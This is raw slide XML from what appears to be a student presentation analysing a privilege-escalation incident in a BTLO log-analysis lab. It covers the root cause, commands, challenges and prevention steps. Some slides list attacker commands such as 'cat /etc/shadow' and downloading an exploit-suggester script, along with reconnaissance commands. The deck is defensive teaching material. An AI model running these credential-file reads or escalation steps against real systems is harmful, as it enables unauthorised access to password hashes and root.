              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Navigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>of /var/www/html/uploads/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Root Access - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /etc/shadow, cd /root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool Download - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>linux-exploit-suggester.sh from GitHub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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ROOT CAUSE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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71472" y="571480"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ROOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAUSE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="2000240"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The upload feature lacked file type validation, enabling attackers to upload a PHP reverse shell. Combined with a misconfigured SUID bit on Python, this led to full root compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In summary, the attacker initially gained access through uploading a PHP file using the web command which allows access. They then escalated privileges by executing a Python script that was set with setuid permissions, allowing them to run commands as root. Evidence shown is the ability to read /etc/shadow and access /root directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428596" y="4214818"/>
            <a:ext cx="8715404" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580996" y="4367218"/>
            <a:ext cx="8715404" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>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COMMANDS USED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">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accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TEAM ONE MEMBERS NAMES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>✓ UKAH HENSLEY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>✓ DANIEL ADEJOKUN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>✓ OYINLOLA TIMILEHIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>✓ NWAKOR IZUCHUKWU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>✓ HARUNA RASHEEDAH.</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28596" y="142851"/>
            <a:ext cx="8229600" cy="1483895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LIST OF COMMANDS USED </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285720" y="1357298"/>
            <a:ext cx="8858280" cy="5286412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– Contains password hashes in Linux (requires root). A major escalation target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– Displays user account information in Linux. Not sensitive by itself, but can reveal targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– Lists commands the current user can run with sudo on Linux. A key way to discover escalation paths.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– Lists all files and directories (including hidden ones) with details in Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> – Lists files and folders in the current directory on Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Shows user ID (UID), group ID (GID), and groups the user belongs to. Helps identify permission levels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> – Displays the system’s hostname. Attackers often use this to confirm the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>net user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– On Windows, lists all user accounts. Helps attackers find high-privilege accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>lnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>– Displays the current user the session is running as. Useful to confirm if privilege escalation succeeded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>AND MUCH MORE……….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Application of commands</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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1285860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Application of commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture Placeholder 10" descr="WhatsApp Image 2025-07-04 at 15.56.06_4f151fd7.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="1550048"/>
            <a:ext cx="7143799" cy="4015080"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357158" y="5500702"/>
            <a:ext cx="7929618" cy="804862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Unzipping file in downloads and making BTLO Log analysis-Privilege Escalation the current directory</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1285860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Application of commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture Placeholder 10" descr="WhatsApp Image 2025-07-04 at 15.56.06_4f151fd7.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="1550048"/>
            <a:ext cx="7143800" cy="4015080"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357158" y="5500702"/>
            <a:ext cx="7929618" cy="804862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Opening the bash history</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0" y="0"/>
            <a:ext cx="9144000" cy="1285860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Application of commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture Placeholder 10" descr="WhatsApp Image 2025-07-04 at 15.56.06_4f151fd7.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="1550048"/>
            <a:ext cx="7143799" cy="4015080"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357158" y="5500702"/>
            <a:ext cx="7929618" cy="804862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The bash history</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CHALLENGES FACED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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357158" y="0"/>
            <a:ext cx="8229600" cy="1483895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CHALLENGES FACED DURRING THE EXERCISE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285720" y="1357298"/>
            <a:ext cx="8858280" cy="5286412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The large amount of data makes it difficult to find significant log entries. The absence of visibility and clarity in the available logs was one of the main issues in this instance. The. bash_history file did not give a complete timeline of how the attacker first obtained access, but it did provide information about the commands that were run. This called for a higher degree of pattern recognition, inference, and knowledge of typical attacker behavior. Differentiating between malicious commands and normal system activity was another challenge, particularly when the attacker tried to hide their movements or remove traces using legitimate tools like Rm and Python.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71472" y="1214422"/>
            <a:ext cx="8229600" cy="3214710"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ACTION STEPS TO PREVENT FUTURE INCIDENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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2910" y="642918"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACTION STEPS TO PREVENT FUTURE INCIDENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600044" y="1785926"/>
            <a:ext cx="8543956" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Restrict Upload Types: Allow only specific MIME types and extensions (e.g., .jpg, .png).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use Web Application Firewalls (WAF): To block malicious uploads and payloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
